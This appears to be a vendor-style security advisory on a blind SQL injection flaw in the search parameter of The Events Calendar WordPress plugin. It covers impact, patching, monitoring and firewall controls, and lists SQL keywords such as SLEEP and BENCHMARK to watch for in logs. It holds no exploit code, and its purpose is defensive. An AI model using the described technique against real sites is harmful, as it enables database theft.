A high-severity vulnerability has been identified in The Events Calendar plugin for WordPress, which could allow an unauthenticated attacker to steal sensitive information from the website's database. This blind SQL Injection flaw can be exploited remotely without any user interaction, potentially leading to a data breach of user credentials, personal information, and other confidential site data. Organizations using the affected plugin are at significant risk of data compromise and should apply the recommended updates immediately.

This vulnerability is a blind SQL Injection that exists due to insufficient sanitization of user-supplied input in the 's' parameter, which is typically used for search functionality. An unauthenticated remote attacker can send specially crafted SQL queries via this parameter. Because the vulnerability is "blind," the attacker does not receive direct database output in the web response; instead, they must use time-based or boolean-based techniques to infer the database structure and exfiltrate data one character at a time by observing the server's response time or changes in the page content.

This vulnerability is rated as High severity with a CVSS score of 7.5. Successful exploitation could lead to a significant data breach, allowing attackers to access and exfiltrate all data stored in the WordPress database. The potential consequences include the theft of user account credentials, personally identifiable information (PII) of customers or event attendees, and other sensitive business data. Such an incident could result in severe reputational damage, loss of customer trust, and potential regulatory fines for non-compliance with data protection regulations like GDPR or CCPA.

Immediate Action: Immediately update The Events Calendar plugin to the latest version released by the vendor, which contains a patch for this vulnerability. After updating, review the plugin's security settings to ensure they are configured correctly. If the plugin is no longer essential for business operations on any website, it should be deactivated and removed to reduce the overall attack surface.

Proactive Monitoring: Monitor web server and Web Application Firewall (WAF) logs for suspicious requests targeting the affected 's' parameter. Look for requests containing SQL keywords (e.g., SELECT, UNION, SLEEP, BENCHMARK) or unusual character patterns. Monitor database logs for abnormally long-running queries or unexpected errors, which can be indicators of an ongoing blind SQL injection attack.

Compensating Controls: If immediate patching is not feasible, implement a Web Application Firewall (WAF) with strict rules designed to detect and block SQL injection patterns. Configure the WAF to specifically filter malicious input in the 's' parameter for all requests. Ensure the database user account for the WordPress application operates under the principle of least privilege, restricting its access to only the necessary databases and tables.

Public Exploit Available: False

Given the high severity (CVSS 7.5) and the potential for a complete database compromise by an unauthenticated attacker, this vulnerability poses a critical risk to the organization. We strongly recommend that all instances of The Events Calendar plugin be updated to the latest patched version immediately. Although this vulnerability is not currently on the CISA KEV list, its impact is severe, and proactive remediation is essential to prevent a potential data breach.